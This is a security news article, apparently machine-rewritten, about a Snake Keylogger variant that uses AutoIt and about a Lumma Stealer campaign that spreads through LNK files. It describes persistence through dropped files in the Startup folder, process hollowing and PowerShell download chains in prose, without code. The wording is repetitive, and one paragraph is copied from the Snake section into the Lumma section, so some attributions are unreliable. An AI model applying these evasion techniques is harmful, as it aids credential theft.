Ethical Hacking News
A new variant of the Snake Keylogger malware has been discovered that leverages AutoIt scripting to evade detection and target Windows users in several countries, including China, Turkey, Indonesia, Taiwan, and Spain. The malware has been responsible for over 280 million blocked infection attempts worldwide since its discovery at the start of the year.
Researchers have discovered a new variant of the Snake Keylogger malware that uses AutoIt scripting to evade detection. The malware has been designed to specifically target Windows users in China, Turkey, Indonesia, Taiwan, and Spain. The malware has been responsible for over 280 million blocked infection attempts worldwide since its discovery at the start of the year. The malware is a type of keylogging malware that steals sensitive information from popular web browsers like Chrome, Edge, and Firefox. AutoIt scripting makes it challenging for traditional detection mechanisms to identify and block the malware. The malware persists on the system by dropping a copy of itself to a file and injecting its main payload into a legitimate .NET process using process hollowing. The malware logs keystrokes, retrieves the victim's IP address and geolocation, and can be used to further compromise the victim's system or steal sensitive data.
In a recent development that highlights the evolving nature of cyber threats, researchers have discovered a new variant of the Snake Keylogger malware that has been engineered to evade detection using AutoIt scripting. This new variant of the malware has been designed to specifically target Windows users located in China, Turkey, Indonesia, Taiwan, and Spain, making it a significant threat to the cybersecurity landscape.
According to Fortinet FortiGuard Labs, the new version of the Snake Keylogger malware has been responsible for over 280 million blocked infection attempts worldwide since its discovery at the start of the year. This staggering figure highlights the sheer scale of the threat posed by this malware variant and underscores the need for users to remain vigilant in their online activities.
The Snake Keylogger malware is a type of keylogging malware that is designed to steal sensitive information from popular web browsers like Chrome, Edge, and Firefox. It achieves this through the use of a low-level keyboard hook that monitors keystrokes, allowing it to capture sensitive input such as banking credentials.
However, what sets this new variant apart from its predecessors is its use of AutoIt scripting to evade detection. AutoIt is an open-source scripting language that allows developers to create custom applications and tools for automating various tasks. However, in the context of malware, AutoIt can be used to create complex and sophisticated payloads that are difficult to detect.
The use of AutoIt scripting by the Snake Keylogger malware makes it challenging for traditional detection mechanisms to identify and block the malware. According to security researcher Kevin Su, "The use of AutoIt not only complicates static analysis by embedding the payload within the compiled script but also enables dynamic behavior that mimics benign automation tools."
Once launched, the Snake Keylogger malware is designed to drop a copy of itself to a file named "ageless.exe" in the folder "%Local_AppData%\supergroup." It also proceeds to drop another file called "ageless.vbs" in the Windows Startup folder such that the Visual Basic Script (VBS) automatically launches the malware every time the system is rebooted.
This persistence mechanism allows the Snake Keylogger malware to maintain access to the compromised system and resume its malicious activities even if the associated process gets terminated. Furthermore, the malware has been observed to inject its main payload into a legitimate .NET process such as "regsvcs.exe" using a technique called process hollowing, permitting it to conceal its presence within a trusted process and sidestep detection.
The Snake Keylogger malware has also been found to log keystrokes and use websites like checkip.dyndns[.]org to retrieve the victim's IP address and geolocation. This information can be used by attackers to further compromise the victim's system or steal sensitive data.
In recent weeks, researchers have observed stealer malware distributed via obfuscated JavaScript files to harvest a wide range of sensitive data from compromised Windows systems and exfiltrate it to a Telegram bot operated by the attacker.
The development comes as CloudSEK detailed a campaign that is exploiting compromised infrastructure associated with educational institutions to distribute malicious LNK files disguised as PDF documents to ultimately deploy the Lumma Stealer malware. The activity, targeting industries like finance, healthcare, technology, and media, is a multi-stage attack sequence that results in the theft of passwords, browser data, and cryptocurrency wallets.
The campaign's primary infection vector involves using malicious LNK (shortcut) files that are crafted to appear as legitimate PDF documents. These files are hosted on a WebDAV server that unsuspecting visitors are redirected to after visiting sites. The LNK file executes a PowerShell command to connect to a remote server and retrieve the next-stage malware, an obfuscated JavaScript code that harbors another PowerShell that downloads Lumma Stealer from the same server and executes it.
The attack chain culminates with the injection of the main payload into a legitimate .NET process such as "regsvcs.exe" using a technique called process hollowing, permitting the malware to conceal its presence within a trusted process and sidestep detection. The development highlights the need for users to remain vigilant in their online activities and underscores the importance of robust cybersecurity measures.
In conclusion, the discovery of this new variant of the Snake Keylogger malware highlights the evolving nature of cyber threats and the need for users to stay informed and proactive in their online activities. As the threat landscape continues to evolve, it is essential that users remain vigilant and take steps to protect themselves against these emerging threats.
Related Information:
https://thehackernews.com/2025/02/new-snake-keylogger-variant-leverages.html
Published: Wed Feb 19 07:47:01 2025 by llama3.2 3B Q4_K_M
